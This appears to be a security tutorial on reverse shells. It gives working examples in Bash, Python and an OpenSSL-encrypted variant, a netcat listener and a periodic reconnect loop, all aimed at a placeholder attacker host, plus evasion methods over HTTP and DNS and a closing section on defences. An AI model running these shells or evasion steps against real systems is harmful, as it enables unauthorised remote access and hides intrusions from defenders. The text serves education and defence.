Understanding Reverse Shells

Introduction

A reverse shell is a remote shell technique that operates in the opposite direction of normal connections. The target system attempts to connect to the attacker’s system, enabling remote command execution. It’s particularly useful in firewall and NAT environments, as most firewalls block incoming connections but allow outgoing ones.

How It Works

The basic flow of a reverse shell works as follows:

1. The attacker sets up a listener on their system to receive connections on a specific port
2. Code executed on the target system attempts to connect to the attacker’s system
3. The input and output of the target system are forwarded to the attacker
4. The attacker can execute commands on the target system and view the results

While typical remote access involves ’the attacker connecting to the target system’, a reverse shell uses the approach of ‘making the target system connect to the attacker’. This reverse connection is the key to bypassing firewalls.

Differences from Bind Shells

A bind shell is a method where the target system opens a port and waits, but this has limited effectiveness in corporate network environments where most inbound connections are blocked. In contrast, reverse shells can bypass many firewall configurations because the target system initiates the connection.

Reverse Shell Implementation Methods

Reverse shells can be implemented using various programming languages and tools. Each method has its advantages and disadvantages, so choose according to the situation. Here, we introduce the most commonly used methods.

Using Bash

1

bash -i >& /dev/tcp/attackerIP/port 0>&1

This single line of code represents the most basic form of a reverse shell. It uses Bash’s special file path /dev/tcp/ to redirect standard input, output, and error streams to a socket. The -i flag creates an interactive shell.

The advantage is that it uses Bash, which is installed by default on most Linux and Unix systems, so no additional tools are needed. However, not all Linux distributions support the /dev/tcp/ feature, so caution is required.

On the attacker’s side, run the listener as follows:

1

nc -lvp 4444

This uses the netcat tool to wait for incoming connections on port 4444. Once the connection is successful, you can access the shell of the target system.

Using Python

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

import socket, subprocess, os

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("attackerIP", port))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])
except:
    # Quietly exit on failure (evasion)
    pass

Python provides powerful socket programming capabilities to implement reliable reverse shells. This code creates and connects a socket, then duplicates the standard streams to the socket so that shell command input and output are transmitted through the socket.

It works on any system with Python installed and uses error handling to quietly exit upon connection failure, making detection difficult. In Windows environments, /bin/sh can be replaced with cmd.exe or powershell.exe.

Detection Evasion Techniques

Basic reverse shells can be easily detected by network monitoring tools. As security equipment has evolved, techniques to evade detection have also developed. Let’s look at methods for more covert communication.

Encrypted Communication

Basic reverse shell connections are mostly transmitted in unencrypted plaintext, making them vulnerable to network traffic analysis. Applying encryption can help evade content inspection-based detection.

1
2
3
4
5
6

# Attacker side (listener)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 443

# Target side (reverse shell)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect attackerIP:443 > /tmp/s; rm /tmp/s

This method uses OpenSSL to create an encrypted communication channel. It appears similar to HTTPS traffic, making traffic analysis difficult.

Using HTTP Web Traffic

Since most companies allow web traffic (ports 80, 443), reverse shells utilizing the HTTP protocol are difficult to detect. They exchange commands by disguising them as web requests, making them hard to distinguish from normal web browsing.

Web-based reverse shells operate in the following manner:

1. The target system periodically sends HTTP requests to the attacker’s server
2. The server sends commands to be executed in response to the request
3. The target system executes the commands and includes the results in the next HTTP request

DNS Tunneling

In extremely restricted environments where even HTTP traffic is monitored, reverse shells using DNS queries can be an alternative. Most networks don’t block DNS queries as they are essential for internet access.

DNS tunneling encodes commands and responses in DNS packets. The principle of operation is as follows:

1. The attacker controls an authoritative DNS server
2. Commands are encoded in the form of DNS subdomains (e.g., cmd.ls-al.attack.com)
3. The target system looks up this domain and receives the command
4. Command execution results are encoded and transmitted as DNS responses

DNS tunneling is slow but has a high chance of working even when all other communications are blocked.

Intermittent Connection and Delayed Execution

Continuous connections are likely to be detected, so using intermittent connection methods can make detection difficult:

1
2
3
4
5

# Try to connect every 15 minutes
while true; do
  bash -i >& /dev/tcp/attackerIP/port 0>&1 2>/dev/null
  sleep 900
done

This approach is effective in bypassing persistent connection detection by network monitoring systems. Additionally, setting connections to occur only outside of business hours or when administrators are away can further reduce the possibility of detection.

Defense Strategies

Effective defense against reverse shell attacks can be broadly divided into network-level and host-level defenses.

Network-Level Defense

Limiting outbound traffic is key to defending against reverse shells. Most organizations only restrict inbound connections and freely allow outbound ones, which becomes the vulnerability for reverse shells.

Effective Network Defense:

• Allow only necessary connections: Manage whitelists of specific IPs and ports that the server needs to access
• Monitor abnormal connections: Block connections to common reverse shell ports like 4444, 5555
• Utilize proxy servers: Inspect and filter all web traffic through proxies
• DNS monitoring: Monitor external requests through internal DNS servers and detect unusual patterns

Abnormal Traffic Patterns:

• Short communications at regular intervals
• Connections occurring during non-business hours
• Outbound connections to unusual ports
• Communications from servers to unexpected destinations

Host-Level Defense

Host-level defense is the last line of defense to minimize damage and detect early, even if an attack succeeds.

Key Security Measures:

• Remove unnecessary services: Remove all unnecessary services and software
• Restrict script execution:
  • PHP: Use disable_functions=system,exec,shell_exec,passthru setting
  • Temporary directories: Apply noexec option to /tmp and /var/tmp
• Process monitoring: Monitor if web servers create shell processes
• Central logging system: Collect and analyze logs from all servers on a central server

Behavior-Based Detection:

• Shell processes attempting network connections
• Shell sessions created without user login
• Multiple failed command executions (traces of attackers exploring the system)
• Attempts to access sensitive configuration files

Through these multi-layered defenses, reverse shell attacks can be effectively detected and blocked.

Conclusion

Reverse shells are very useful tools in modern cyber attacks, working effectively even in firewall and NAT environments. It’s important to understand various implementation methods and detection evasion techniques, and to establish defense strategies against them.